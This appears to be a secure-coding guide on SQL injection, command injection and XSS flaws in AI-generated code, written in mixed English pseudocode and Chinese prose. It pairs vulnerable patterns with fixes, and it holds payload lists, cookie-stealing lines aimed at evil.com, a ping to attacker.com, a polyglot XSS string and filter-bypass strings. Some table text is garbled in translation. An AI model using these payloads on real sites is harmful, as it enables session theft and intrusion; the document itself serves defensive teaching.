// In GBK: 0xbf5c27 -> valid multibyte char + literal quote
// ALWAYS USE PARAMETERIZATION - it's not about escaping
function getUserByNameSafe(name):
query = "SELECT * FROM users WHERE name = ?"
return database.execute(query, [name])
关键见解:参数化不会“逃逸”——它会将查询结构和数据分开发送。
// DANGEROUS: Trusting data because it's "internal"
function processMessage(messageFromQueue):
// "This is from our internal queue, so it's safe"
userId = messageFromQueue.userId
query = f"SELECT * FROM users WHERE id = {userId}"
return database.execute(query)
// BUT: Where did that queue message originate?
// - User input that was serialized to queue
// - External API response stored in queue
// - Another service that has its own vulnerabilities
// DANGEROUS: Trusting data from other tables/services
function getOrderDetails(orderId):
order = database.execute("SELECT * FROM orders WHERE id = ?", [orderId])
// Order.notes was user-supplied
query = f"SELECT * FROM notes WHERE content LIKE '%{order.notes}%'"
// Still vulnerable to second-order injection
// SECURE: Parameterize ALL queries regardless of data source
function processMessageSafe(messageFromQueue):
query = "SELECT * FROM users WHERE id = ?"
return database.execute(query, [messageFromQueue.userId])
规则:在构建查询时,永远不要信任任何数据——始终要参数化。
// DANGEROUS: Parameterizing some parts but not others
function searchUsers(name, sortColumn, limit):
// Parameterized the value, but not ORDER BY or LIMIT
query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortColumn} LIMIT {limit}"
return database.execute(query, [name])
// Attack: sortColumn = "1; DELETE FROM users; --"
// Attack: limit = "1 UNION SELECT password FROM admin_users"
// DANGEROUS: Parameterized WHERE but not table
function getDataFlexible(tableName, filterColumn, filterValue):
query = f"SELECT * FROM {tableName} WHERE {filterColumn} = ?"
return database.execute(query, [filterValue])
// Table name and column still injectable
// SECURE: Validate/allowlist everything that can't be parameterized
function searchUsersSafe(name, sortColumn, limit):
// Allowlist for sort column
allowedSorts = {"name", "email", "created_at"}
sortCol = sortColumn if sortColumn in allowedSorts else "name"
// Validate limit is positive integer
limitNum = min(max(int(limit), 1), 100) // Clamp to 1-100
query = f"SELECT * FROM users WHERE name = ? ORDER BY {sortCol} LIMIT {limitNum}"
return database.execute(query, [name])
关键见解:每个可注入位置都需要参数化或允许列表验证。
// Regex patterns to find SQL injection vulnerabilities:
// 1. String concatenation with SQL keywords
regex: /(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE|ORDER BY).*(\+|\.concat|\$\{|f['"])/i
// 2. Format strings with SQL
regex: /f["'].*\b(SELECT|INSERT|UPDATE|DELETE)\b.*\{.*\}/i
// 3. String interpolation in queries
regex: /execute\s*\(\s*["`'].*\$\{?[a-zA-Z_]/
// Command injection patterns:
// 4. Shell execution with concatenation
regex: /(system|exec|shell_exec|popen|subprocess\.run|os\.system)\s*\(.*(\+|\$\{|f['"])/
// 5. Shell=True with variables
regex: /shell\s*=\s*[Tt]rue.*\{|shell\s*=\s*[Tt]rue.*\+/
// SQL Injection Test Payloads:
basicTests = [
"' OR '1'='1", // Basic auth bypass
"'; DROP TABLE test; --", // Stacked queries
"' UNION SELECT null--", // Union-based
"1 AND 1=1", // Boolean-based
"1' AND SLEEP(5)--", // Time-based blind
]
// Command Injection Test Payloads:
commandTests = [
"; whoami", // Command chaining
"| id", // Pipe injection
"$(whoami)", // Command substitution
"`id`", // Backtick substitution
"& ping -c 4 attacker.com", // Background execution
]
// Testing Methodology:
1. Identify all input points (forms, URLs, headers, JSON fields)
2. Trace input flow to database queries or shell commands
3. Inject test payloads at each point
4. Monitor for:
- SQL errors in response
- Time delays (for blind injection)
- DNS/HTTP callbacks (for out-of-band)
- Changed behavior indicating injection success
| 查看 | 需要注意什么 |
|---|---|
| 查询构造 | 任何字符串连接或与查询字符串的插值 |
| 动态标识符 | 用户输入的表名、列名、排序依据 |
| ORM 中的原始查询 | .raw(),,.execute()或类似字符串构建 |
| Shell 执行 | 任何使用system(),,exec()shell=True |
| 指挥大楼 | 命令执行前进行字符串拼接 |
| 输入源 | 跟踪从请求到查询/命令的数据 |
CWE 参考: CWE-79(网页生成过程中输入的不正确中和)、CWE-80(基本 XSS)、CWE-83(属性中的不正确中和)、CWE-87(URI 中的不正确中和)
优先级评分: 23(频率:10,严重性:8,可检测性:5)
跨站脚本攻击(XSS)是人工智能生成代码中最常见的漏洞之一。研究表明,86% 的人工智能生成代码无法抵御 XSS 攻击(Veracode 2025),而且人工智能生成代码包含 XSS 的可能性是人类编写代码的 2.74 倍(CodeRabbit 分析)。
为什么人工智能模型会产生 XSS 漏洞:
上下文盲点: XSS 防护需要理解用户输入将被渲染的上下文——HTML 正文、属性、JavaScript、CSS 或 URL。每种上下文都需要不同的编码。由于缺乏对渲染上下文的感知,AI 模型经常使用通用编码或不进行编码。
训练数据显示 innerHTML 无处不在:教程和 Stack Overflow 上的回答大量使用 `<div>` innerHTML、document.write()`<span>` 和模板字符串注入来进行 DOM 操作。人工智能将这些学习为标准模式。
框架误解:像 React 这样的现代框架提供了自动转义,但 AI 经常使用 `<div>`、`<span>` 或原始模板插值来绕过这些安全措施,尤其是dangerouslySetInnerHTML在v-html任务似乎需要“丰富的”HTML 输出时。
编码与验证的混淆:人工智能模型通常会进行输入验证(检查允许的字符),但会忽略输出编码(安全地在上下文中呈现数据)。验证是为了确保数据完整性;编码是为了防止跨站脚本攻击 (XSS)。
客户端信任:人工智能通常将客户端代码视为“安全”的,因为它运行在浏览器中。它无法识别出跨站脚本攻击(XSS)正是利用了浏览器对应用程序的信任。
XSS 的影响:
XSS 变体:
| 类型 | 贮存 | 执行 | 示例向量 |
|---|---|---|---|
| 反射 | URL/请求 | 即时 | 在搜索结果页面中搜索查询 |
| 已存储 | 数据库 | 后来的访客 | 在博客中使用脚本发表评论 |
| 基于 DOM 的 | 客户端 | JavaScript 进程 | 由JS处理的URL片段 |
| 突变(mXSS) | 消毒器旁路 | DOM突变 | 解析过程中发生变化的标记 |
// VULNERABLE: Direct injection into HTML body
function displayUserComment(comment):
// User input directly placed in HTML
document.getElementById("comments").innerHTML =
"<div class='comment'>" + comment + "</div>"
// Attack: comment = "<script>document.location='http://evil.com/steal?c='+document.cookie</script>"
// Result: Script executes, cookies sent to attacker
// VULNERABLE: Server-side template without encoding
function renderProfilePage(username, bio):
return """
<html>
<body>
<h1>Profile: {username}</h1>
<p>{bio}</p>
</body>
</html>
""".format(username=username, bio=bio)
// Attack: bio = "<img src=x onerror='alert(document.cookie)'>"
// Result: onerror handler executes JavaScript
// VULNERABLE: Using document.write
function showWelcome(name):
document.write("<h2>Welcome, " + name + "!</h2>")
// Attack: name = "<img src=x onerror=alert('XSS')>"
为什么这样做很危险:
onerror,,onload)onclick执行时不带脚本标签document.write并innerHTML解析用户输入中的 HTML// VULNERABLE: User input in HTML attributes
function renderImage(imageUrl, altText):
return '<img src="' + imageUrl + '" alt="' + altText + '">'
// Attack: altText = '" onmouseover="alert(document.cookie)" x="'
// Result: <img src="img.jpg" alt="" onmouseover="alert(document.cookie)" x="">
// VULNERABLE: Unquoted attributes
function renderLink(url, text):
return "<a href=" + url + ">" + text + "</a>"
// Attack: url = "http://site.com onclick=alert(1)"
// Result: <a href=http://site.com onclick=alert(1)>text</a>
// VULNERABLE: Input in style attribute
function setBackgroundColor(color):
element.setAttribute("style", "background-color: " + color)
// Attack: color = "red; background-image: url('javascript:alert(1)')"
// Attack: color = "expression(alert('XSS'))" // IE-specific
// VULNERABLE: Event handler attribute
function renderButton(buttonId, label):
return '<button id="' + buttonId + '" onclick="handleClick(\'' + label + '\')">' + label + '</button>'
// Attack: label = "'); alert(document.cookie); ('"
// Result: onclick="handleClick(''); alert(document.cookie); ('")"
为什么这样做很危险:
href,,src)style具有特殊的解析规则// VULNERABLE: User input embedded in JavaScript
function generateUserScript(username):
return """
<script>
var currentUser = '{username}';
displayGreeting(currentUser);
</script>
""".format(username=username)
// Attack: username = "'; alert(document.cookie); //'"
// Result: var currentUser = ''; alert(document.cookie); //';
// VULNERABLE: JSON data embedded in script
function embedUserData(userData):
return """
<script>
var data = {userData};
processData(data);
</script>
""".format(userData=jsonEncode(userData))
// Attack: userData contains </script><script>alert(1)</script>
// JSON encoding doesn't prevent HTML context escape
// VULNERABLE: Template literals with user input
function renderTemplate(message):
return `<script>showNotification("${message}")</script>`
// Attack: message = '${alert(document.cookie)}' // Template literal injection
// Attack: message = '");alert(document.cookie);//' // String escape
// VULNERABLE: Dynamic script construction
function addEventHandler(eventName, userCallback):
element.setAttribute("onclick", "handleEvent('" + userCallback + "')")
// Attack: userCallback = "'); stealData(); ('"
为什么这样做很危险:
</script>) 可以跳出脚本块。// VULNERABLE: User input in href attribute
function renderNavLink(destination):
return '<a href="' + destination + '">Click here</a>'
// Attack: destination = "javascript:alert(document.cookie)"
// Result: <a href="javascript:alert(document.cookie)">Click here</a>
// VULNERABLE: URL parameters without encoding
function buildSearchUrl(query):
return '<a href="/search?q=' + query + '">Search again</a>'
// Attack: query = '" onclick="alert(1)" x="'
// Result: <a href="/search?q=" onclick="alert(1)" x="">Search again</a>
// VULNERABLE: Redirect based on user input
function handleRedirect(url):
window.location = url
// Attack: url = "javascript:alert(document.cookie)"
// Result: JavaScript execution via location change
// VULNERABLE: Open redirect leading to XSS
function redirectAfterLogin(returnUrl):
return '<meta http-equiv="refresh" content="0;url=' + returnUrl + '">'
// Attack: returnUrl = "data:text/html,<script>alert(1)</script>"
// Attack: returnUrl = "javascript:alert(1)"
为什么这样做很危险:
javascript:URL在被导航时会执行代码。data:URL 可以包含可执行的 HTML/JavaScript 代码。vbscript:URL 在旧版 IE 浏览器上执行// VULNERABLE: User input in CSS
function applyCustomStyle(customCss):
styleElement = document.createElement("style")
styleElement.textContent = ".user-style { " + customCss + " }"
document.head.appendChild(styleElement)
// Attack: customCss = "} body { background: url('http://evil.com/log?data=' + document.cookie); } .x {"
// Result: CSS exfiltration of page data
// VULNERABLE: CSS expression (legacy IE)
function setWidth(width):
element.style.cssText = "width: " + width
// Attack: width = "expression(alert(document.cookie))"
// Result: JavaScript execution via CSS expression (IE)
// VULNERABLE: CSS injection via style attribute
function renderAvatar(avatarUrl):
return '<div style="background-image: url(' + avatarUrl + ')"></div>'
// Attack: avatarUrl = "x); } body { background: red; } .x { content: url(x"
// Modern Attack: avatarUrl = "https://evil.com/?' + btoa(document.body.innerHTML) + '"
// VULNERABLE: CSS @import injection
function loadTheme(themeUrl):
return "<style>@import url('" + themeUrl + "');</style>"
// Attack: themeUrl = "'); } * { background: url('http://evil.com/steal?"
为什么这样做很危险:
url()CSS 可以通过请求泄露数据。expression()会执行JavaScript@import可以加载攻击者控制的样式表// SECURE: HTML entity encoding for body content
function htmlEncode(str):
return str
.replace("&", "&") // Must be first
.replace("<", "<")
.replace(">", ">")
.replace('"', """)
.replace("'", "'")
.replace("/", "/") // Prevents </script> escapes
function displayUserComment(comment):
safeComment = htmlEncode(comment)
document.getElementById("comments").innerHTML =
"<div class='comment'>" + safeComment + "</div>"
// SECURE: Using textContent instead of innerHTML
function displayUserCommentSafe(comment):
div = document.createElement("div")
div.className = "comment"
div.textContent = comment // Automatically safe - no HTML interpretation
document.getElementById("comments").appendChild(div)
// SECURE: Server-side template with auto-escaping
function renderProfilePage(username, bio):
// Use templating engine with auto-escaping enabled
return template.render("profile.html", {
username: username, // Engine auto-escapes
bio: bio
})
// SECURE: Framework createElement pattern
function createUserCard(name, email):
card = document.createElement("article")
nameEl = document.createElement("h3")
nameEl.textContent = name // Safe
emailEl = document.createElement("p")
emailEl.textContent = email // Safe
card.appendChild(nameEl)
card.appendChild(emailEl)
return card
为什么说它是安全的:
textContent从不解释 HTML// SECURE: Attribute encoding (superset of HTML encoding)
function attributeEncode(str):
return str
.replace("&", "&")
.replace("<", "<")
.replace(">", ">")
.replace('"', """)
.replace("'", "'")
.replace("`", "`")
.replace("=", "=")
// SECURE: Always quote attributes and encode values
function renderImage(imageUrl, altText):
safeUrl = attributeEncode(imageUrl)
safeAlt = attributeEncode(altText)
return '<img src="' + safeUrl + '" alt="' + safeAlt + '">'
// SECURE: Using setAttribute (browser handles encoding)
function renderImageSafe(imageUrl, altText):
img = document.createElement("img")
img.setAttribute("src", imageUrl) // Safe
img.setAttribute("alt", altText) // Safe
return img
// SECURE: Data attributes with proper encoding
function renderDataElement(userId, userName):
div = document.createElement("div")
div.dataset.userId = userId // Automatically safe
div.dataset.userName = userName // Automatically safe
return div
// SECURE: Style attribute with validation
ALLOWED_COLORS = {"red", "blue", "green", "yellow", "#fff", "#000"}
function setBackgroundColor(color):
if color in ALLOWED_COLORS:
element.style.backgroundColor = color
else:
element.style.backgroundColor = "white" // Safe default
为什么说它是安全的:
// SECURE: JavaScript string encoding
function jsStringEncode(str):
return str
.replace("\\", "\\\\") // Backslash first
.replace("'", "\\'")
.replace('"', '\\"')
.replace("\n", "\\n")
.replace("\r", "\\r")
.replace("</", "<\\/") // Prevent script tag escape
.replace("<!--", "\\x3C!--") // Prevent HTML comment
// SECURE: JSON encoding for embedding data
function generateUserScript(userData):
// Use proper JSON encoding and parse safely
jsonData = jsonEncode(userData)
// Also HTML-encode to prevent </script> breakout
safeJson = htmlEncode(jsonData)
return """
<script>
var data = JSON.parse('{safeJson}');
processData(data);
</script>
""".format(safeJson=safeJson)
// BETTER: Use data attributes instead of inline scripts
function embedUserDataSafe(element, userData):
// Store data in attribute, process in external script
element.dataset.user = jsonEncode(userData)
// External script reads: JSON.parse(element.dataset.user)
// SECURE: Separate data from code with JSON endpoint
function loadUserData():
// Instead of embedding in HTML, fetch from API
fetch('/api/user/data')
.then(response => response.json())
.then(data => processData(data))
// SECURE: Using structured data in script type
function embedStructuredData(pageData):
return """
<script type="application/json" id="page-data">
{jsonData}
</script>
<script>
var data = JSON.parse(
document.getElementById('page-data').textContent
);
</script>
""".format(jsonData=jsonEncode(pageData))
为什么说它是安全的:
</script>转义type="application/json"代码块不会作为 JavaScript 执行。// SECURE: URL encoding for query parameters
function urlEncode(str):
return encodeURIComponent(str)
function buildSearchUrl(query):
safeQuery = urlEncode(query)
return '/search?q=' + safeQuery
// SECURE: Validating URL schemes (allowlist)
SAFE_SCHEMES = {"http", "https", "mailto"}
function validateUrl(url):
try:
parsed = parseUrl(url)
if parsed.scheme.lower() in SAFE_SCHEMES:
return url
catch:
pass
return "/fallback" // Safe default
function renderLink(destination, text):
safeUrl = validateUrl(destination)
safeText = htmlEncode(text)
return '<a href="' + attributeEncode(safeUrl) + '">' + safeText + '</a>'
// SECURE: URL validation with additional checks
function validateExternalUrl(url):
parsed = parseUrl(url)
// Check scheme
if parsed.scheme.lower() not in {"http", "https"}:
return null
// Check for credential injection
if parsed.username or parsed.password:
return null
// Check for IP address (optional restriction)
if isIpAddress(parsed.host):
return null
return url
// SECURE: Relative URLs only (prevent open redirect)
function validateRedirectUrl(url):
// Only allow relative paths
if url.startsWith("/") and not url.startsWith("//"):
// Prevent path traversal
normalized = normalizePath(url)
if not ".." in normalized:
return normalized
return "/" // Safe default
为什么说它是安全的:
encodeURIComponent处理特殊字符javascript:URLdata:// SECURE: Safe DOM manipulation patterns
// Instead of innerHTML with user data:
// DANGEROUS: element.innerHTML = "<p>" + userInput + "</p>"
// SECURE: Use textContent for text nodes
function setElementText(element, text):
element.textContent = text // Never interprets HTML
// SECURE: Build DOM programmatically
function createListItem(text, isHighlighted):
li = document.createElement("li")
li.textContent = text // Safe text assignment
if isHighlighted:
li.classList.add("highlighted") // Safe class manipulation
return li
// SECURE: Use template elements for complex HTML
function createCardFromTemplate(name, description):
template = document.getElementById("card-template")
card = template.content.cloneNode(true)
// Set text content safely
card.querySelector(".card-name").textContent = name
card.querySelector(".card-desc").textContent = description
return card
// SECURE: Use DocumentFragment for batch operations
function renderList(items):
fragment = document.createDocumentFragment()
for item in items:
li = document.createElement("li")
li.textContent = item.name // Safe
fragment.appendChild(li)
document.getElementById("list").appendChild(fragment)
// SECURE: Sanitize when HTML is genuinely needed
function renderRichContent(htmlContent):
// Use DOMPurify or similar trusted sanitizer
sanitized = DOMPurify.sanitize(htmlContent, {
ALLOWED_TAGS: ["b", "i", "em", "strong", "a", "p", "br"],
ALLOWED_ATTR: ["href"],
ALLOW_DATA_ATTR: false
})
element.innerHTML = sanitized
为什么说它是安全的:
textContent从不解析 HTML 或脚本。createElement+textContent本质上是安全的// DANGEROUS: Browser mutations can bypass sanitization
// How mXSS works:
// 1. Sanitizer processes malformed HTML
// 2. Browser "fixes" the HTML during parsing
// 3. Fixed HTML contains executable content
// Example: Backtick mutation
inputHtml = "<img src=x onerror=`alert(1)`>"
// Some sanitizers don't escape backticks
// Browser may convert backticks to quotes in certain contexts
// Example: Namespace confusion
inputHtml = "<math><annotation-xml><foreignObject><script>alert(1)</script>"
// SVG/MathML namespaces have different parsing rules
// Sanitizer might miss the nested script
// Example: Table element mutations
inputHtml = "<table><form><input name='x'></form></table>"
// Browser moves <form> outside <table> during parsing
// Can result in unexpected DOM structure
// SECURE: Use battle-tested sanitizer with mXSS protection
function sanitizeHtml(html):
return DOMPurify.sanitize(html, {
// DOMPurify has mXSS protection built-in
USE_PROFILES: {html: true},
// Optionally restrict further
FORBID_TAGS: ["style", "math", "svg"],
FORBID_ATTR: ["style"]
})
// BETTER: Avoid HTML sanitization when possible
function renderUserContent(content):
// If you only need formatted text, use markdown
markdownHtml = markdownToHtml(content) // Controlled conversion
return DOMPurify.sanitize(markdownHtml)
检测:使用以下方法测试:
<a><table><a>)<svg>,,<math>)<foreignObject><?xml>)// DANGEROUS: Payloads that work in multiple contexts
// Polyglot XSS example:
payload = "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>"
// This payload attempts to work in:
// - JavaScript context (javascript: URL)
// - HTML attribute context (onclick)
// - Inside HTML comments
// - Inside style/title/textarea/script tags
// - SVG context
// Why this matters:
// - Single payload tests multiple vectors
// - Fuzzy input handling might trigger in unexpected context
// - Copy-paste from "safe" context to unsafe context
// SECURE: Context-specific encoding, not generic filtering
function outputToContext(value, context):
switch context:
case "html_body":
return htmlEncode(value)
case "html_attribute":
return attributeEncode(value)
case "javascript_string":
return jsStringEncode(value)
case "url_parameter":
return urlEncode(value)
case "css_value":
return cssEncode(value)
default:
throw Error("Unknown context: " + context)
// Each encoder handles that specific context's dangerous characters
检测:在安全测试中使用多语言有效载荷来发现上下文混淆漏洞。
// DANGEROUS: Incomplete encoding can be bypassed
// Bypass 1: Case variation
// Filter checks: if "<script" in input: reject
// Bypass: "<ScRiPt>alert(1)</sCrIpT>"
// Browser: case-insensitive HTML parsing
// Bypass 2: HTML entities in event handlers
// Filter: remove "javascript:"
// Input: "javascript:alert(1)"
// Browser decodes entities before processing
// Bypass 3: Null bytes
// Input: "java\x00script:alert(1)"
// Some filters/WAFs don't handle null bytes
// Some browsers ignore them
// Bypass 4: Overlong UTF-8
// Normal '<': 0x3C
// Overlong: 0xC0 0xBC (invalid UTF-8, but some parsers accept)
// Bypass 5: Mixed encoding
// Input: "%3Cscript%3Ealert(1)%3C/script%3E"
// If HTML-encoded before URL-decoded, double encoding attack
// SECURE: Encode on output, not filter on input
function secureOutput(userInput, context):
// Don't try to filter/blocklist dangerous patterns
// DO encode appropriately for the output context
// The encoding makes ALL user input safe
// regardless of what it contains
return encode(userInput, context)
// SECURE: Canonicalize THEN validate
function processInput(input):
// 1. Decode all encoding layers
decoded = fullyDecode(input) // URL, HTML entities, etc.
// 2. Normalize (lowercase, normalize unicode)
normalized = normalize(decoded)
// 3. Validate against rules
if not isValid(normalized):
reject()
// 4. Store normalized form
store(normalized)
// 5. Encode on output (later)
关键见解:输出编码比输入过滤更可靠,因为您可以确切地知道输出上下文。
// DANGEROUS: HTML elements can override JavaScript globals
// How DOM clobbering works:
// Elements with id or name attributes create global variables
html = '<img id="alert">'
// Now: window.alert === <img> element
// alert(1) throws error instead of showing alert
// Exploitable clobbering:
html = '<form id="document"><input name="cookie" value="fake"></form>'
// document.cookie might now reference the input element
// Attack on sanitizer output:
html = '<a id="cid" name="cid" href="javascript:alert(1)">'
// If code does: location = document.getElementById(cid)
// Attacker controls the navigation
// More dangerous patterns:
html = '<form id="x"><input id="y"></form>'
// x.y now references the input
// Chains allow deep property access
// SECURE: Avoid global lookups for security-sensitive operations
function getConfigValue(key):
// DON'T: return window[key]
// DON'T: return document.getElementById(key).value
// DO: Use a namespaced config object
return APP_CONFIG[key]
// SECURE: Use unique prefixes for security-critical IDs
function getElementById(id):
// Prefix with app-specific namespace
return document.getElementById("app__" + id)
// SECURE: Validate types after DOM queries
function getFormElement(id):
element = document.getElementById(id)
if element instanceof HTMLFormElement:
return element
throw Error("Expected form element")
检测:使用以下方法测试:
alert, name, location)匹配的元素cookie,domain)// DANGEROUS: Single encoding for multiple contexts
function saveUserProfile(name, bio):
// Encoding once at input time
safeName = htmlEncode(name)
safeBio = htmlEncode(bio)
database.save({name: safeName, bio: safeBio})
function displayProfile(user):
// HTML context - HTML encoding was correct
htmlOutput = "<h1>" + user.name + "</h1>" // OK
// But JavaScript context needs different encoding!
jsOutput = "<script>var name = '" + user.name + "';</script>"
// If name contained single quotes: "O'Brien" -> already encoded as "O'Brien"
// Now in JS context, ' is literal text, not a quote escape
// And URL context is wrong too!
urlOutput = "/profile?name=" + user.name
// HTML entities in URL don't encode properly
// SECURE: Store raw data, encode on output
function saveUserProfile(name, bio):
// Store raw (unencoded) user input
database.save({name: name, bio: bio})
function displayProfile(user):
// Encode specifically for each output context
htmlName = htmlEncode(user.name)
jsName = jsStringEncode(user.name)
urlName = urlEncode(user.name)
htmlOutput = "<h1>" + htmlName + "</h1>"
jsOutput = "<script>var name = '" + jsName + "';</script>"
urlOutput = "/profile?name=" + urlName
规则:存储原始数据。在输出时,根据具体上下文进行编码。
// DANGEROUS: Relying only on client-side protection
// Client-side sanitization
function submitComment(comment):
// Sanitize before sending to server
cleanComment = DOMPurify.sanitize(comment)
fetch("/api/comments", {
method: "POST",
body: JSON.stringify({comment: cleanComment})
})
// Problem: Attacker bypasses client-side code entirely
// Using curl, Postman, or modified browser
curlCommand = """
curl -X POST https://site.com/api/comments \\
-H "Content-Type: application/json" \\
-d '{"comment": "<script>alert(1)</script>"}'
"""
// Server trusts the input because "client sanitized it"
function handleCommentApi(request):
comment = request.body.comment
database.saveComment(comment) // Stored XSS!
// SECURE: Server-side sanitization is mandatory
function handleCommentApiSecure(request):
comment = request.body.comment
// Server-side sanitization
cleanComment = serverSideSanitize(comment)
database.saveComment(cleanComment)
function displayComment(comment):
// Still encode on output (defense in depth)
return htmlEncode(comment)
// NOTE: Client-side sanitization can still be useful for:
// - Preview functionality
// - Reducing server load
// - Better UX feedback
// But it must NEVER be the only protection
规则:服务器端编码/清理是强制性的。客户端是可选的增强功能。
// DANGEROUS: Trying to block known-bad patterns
function filterXss(input):
// Block list approach
dangerous = [
"<script", "</script>",
"javascript:",
"onerror", "onload", "onclick",
"alert", "eval", "document.cookie"
]
result = input
for pattern in dangerous:
result = result.replace(pattern, "")
return result
// Bypasses:
// 1. Case: "<SCRIPT>alert(1)</SCRIPT>"
// 2. Encoding: "<script>alert(1)</script>"
// 3. Null bytes: "<scr\x00ipt>alert(1)</scr\x00ipt>"
// 4. Other events: "onmouseover", "onfocus", "onanimationend"
// 5. Other sinks: "fetch('http://evil.com/'+document.cookie)"
// 6. New features: Future HTML/JS features not in blocklist
// DANGEROUS: Regex blocklist
function filterXssRegex(input):
// Still bypassable
if regex.match(/<script.*?>.*?<\/script>/i, input):
return ""
return input
// Bypass: "<scr<script>ipt>alert(1)</scr</script>ipt>"
// After removal: "<script>alert(1)</script>"
// SECURE: Allowlist approach
function sanitizeUsername(input):
// Only allow expected characters
if regex.match(/^[a-zA-Z0-9_-]{1,30}$/, input):
return input
throw ValidationError("Invalid username")
// SECURE: Proper encoding (makes blocklist unnecessary)
function displaySafely(input):
return htmlEncode(input) // All input is safe after encoding
规则:允许列表中包含预期内容,或者对所有内容进行编码。切勿将危险模式列入黑名单。
// DANGEROUS: Assuming sanitization handles everything
function processHtml(userHtml):
// "The library handles XSS"
clean = sanitizer.sanitize(userHtml)
// But then using it unsafely:
// 1. Wrong context
return "<script>var content = '" + clean + "';</script>"
// Sanitizer cleaned HTML context, not JavaScript context
// 2. Double encoding
clean = sanitizer.sanitize(htmlEncode(userHtml))
// Now clean contains encoded entities that might decode later
// 3. Post-processing that reintroduces vulnerabilities
processed = clean.replace("[link]", "<a href='").replace("[/link]", "'>link</a>")
// Custom processing after sanitization can break safety
// SECURE: Understand what the sanitizer does
function processHtmlSecure(userHtml):
// 1. Sanitize for HTML context
cleanHtml = DOMPurify.sanitize(userHtml, {
ALLOWED_TAGS: ["p", "b", "i", "a"],
ALLOWED_ATTR: ["href"]
})
// 2. Validate URLs in allowed href attributes
dom = parseHtml(cleanHtml)
for link in dom.querySelectorAll("a[href]"):
if not isValidUrl(link.href):
link.removeAttribute("href")
// 3. Use only in HTML context
return cleanHtml
// SECURE: For JavaScript context, don't use HTML sanitizer
function embedDataInJs(data):
// JSON encoding is the appropriate "sanitizer" for JSON/JS
return JSON.stringify(data) // Handles all escaping for JSON
规则:针对不同上下文使用正确的编码/清理方法。清理方法与上下文相关。
// React default: Auto-escaping in JSX
function UserProfile(props):
// SAFE: React escapes by default
return (
<div>
<h1>{props.username}</h1> // Auto-escaped
<p>{props.bio}</p> // Auto-escaped
</div>
)
// DANGEROUS: dangerouslySetInnerHTML bypasses protection
function RichContent(props):
// VULNERABLE if props.html is user-controlled
return <div dangerouslySetInnerHTML={{__html: props.html}} />
// SECURE: Sanitize before using dangerouslySetInnerHTML
function RichContentSafe(props):
sanitizedHtml = DOMPurify.sanitize(props.html)
return <div dangerouslySetInnerHTML={{__html: sanitizedHtml}} />
// DANGEROUS: href with user input
function UserLink(props):
// VULNERABLE: javascript: URLs execute
return <a href={props.url}>{props.text}</a>
// SECURE: Validate URL scheme
function UserLinkSafe(props):
url = props.url
if not url.startsWith("http://") and not url.startsWith("https://"):
url = "#" // Safe fallback
return <a href={url}>{props.text}</a>
// Vue default: Auto-escaping with {{ }}
<template>
<!-- SAFE: Vue escapes interpolation -->
<h1>{{ username }}</h1>
<p>{{ bio }}</p>
</template>
// DANGEROUS: v-html bypasses protection
<template>
<!-- VULNERABLE: v-html renders raw HTML -->
<div v-html="userContent"></div>
</template>
// SECURE: Sanitize before v-html
<script>
export default {
computed: {
safeContent() {
return DOMPurify.sanitize(this.userContent)
}
}
}
</script>
<template>
<div v-html="safeContent"></div>
</template>
// DANGEROUS: Dynamic attribute binding
<template>
<!-- VULNERABLE: javascript: in href -->
<a :href="userUrl">Link</a>
</template>
// SECURE: URL validation
<script>
export default {
computed: {
safeUrl() {
return this.isValidHttpUrl(this.userUrl) ? this.userUrl : '#'
}
}
}
</script>
// Angular default: Auto-sanitization
@Component({
template: `
<!-- SAFE: Angular sanitizes -->
<h1>{{ username }}</h1>
<p>{{ bio }}</p>
`
})
// Angular [innerHTML] is semi-safe (Angular sanitizes)
@Component({
template: `
<!-- Angular sanitizes, but still risky -->
<div [innerHTML]="userContent"></div>
`
})
// DANGEROUS: Bypassing sanitization
import { DomSanitizer } from '@angular/platform-browser'
@Component({...})
class MyComponent {
constructor(private sanitizer: DomSanitizer) {}
// VULNERABLE: Bypasses Angular's sanitization
get unsafeHtml() {
return this.sanitizer.bypassSecurityTrustHtml(this.userInput)
}
}
// SECURE: Let Angular sanitize, or use additional sanitizer
@Component({...})
class MyComponentSafe {
get safeHtml() {
// Angular's default sanitization is usually sufficient
// For extra safety, pre-sanitize
return DOMPurify.sanitize(this.userInput)
}
}
// Jinja2 (Python)
// SAFE: Auto-escaping by default
<h1>{{ username }}</h1>
// DANGEROUS: |safe filter
<div>{{ user_html | safe }}</div> <!-- VULNERABLE -->
// Handlebars
// SAFE: {{ }} escapes
<h1>{{username}}</h1>
// DANGEROUS: {{{ }}} triple braces
<div>{{{user_html}}}</div> <!-- VULNERABLE -->
// EJS (Node.js)
// SAFE: <%= %> escapes
<h1><%= username %></h1>
// DANGEROUS: <%- %> raw
<div><%- user_html %></div> <!-- VULNERABLE -->
// SECURE PATTERN: Always use escaping syntax, sanitize if HTML needed
// Jinja2
<div>{{ user_html | sanitize }}</div> <!-- Custom filter using DOMPurify -->
// Handlebars
<div>{{sanitize user_html}}</div> <!-- Custom helper -->
// EJS
<div><%= sanitize(user_html) %></div> <!-- Helper function -->
innerHTMLdocument.write避免使用、、以及类似情况,或使用经过处理的输入。textContentinnerHTML尽可能使用。dangerouslySetInnerHTML等v-html仅|safe用于已消毒的内容CWE 参考: CWE-287(身份验证不当)、CWE-384(会话固定)、CWE-613(会话过期时间不足)、CWE-307(对过多身份验证尝试的限制不当)、CWE-308(使用单因素身份验证)、CWE-640(密码恢复机制薄弱)、CWE-1275(具有不当 SameSite 属性的敏感 Cookie)
优先级评分: 22(频率:8,严重性:9,可检测性:5)
身份验证和会话管理是应用程序开发中最复杂的安全领域之一。由于以下几个相互关联的原因,人工智能模型尤其难以处理这些模式:
为什么人工智能模型会生成不安全的身份验证码:
复杂性催生捷径:身份验证需要协调多个组件——密码存储、会话管理、令牌生成、Cookie 处理和注销流程。人工智能模型为了简化操作,常常会生成一些“可运行”的代码,但这些代码往往会省略一些必要的安全层。
教程综合症:训练数据中充斥着大量简化的身份验证教程,这些教程旨在讲解概念,而非构建生产系统。这些教程通常忽略速率限制、安全令牌生成、正确的会话失效机制以及时序攻击防御等内容。
JWT 误解: JSON Web Tokens 已成为默认推荐,但 AI 模型经常生成存在严重缺陷的 JWT 实现——“none”算法漏洞、弱密钥、验证不当和存储不安全。
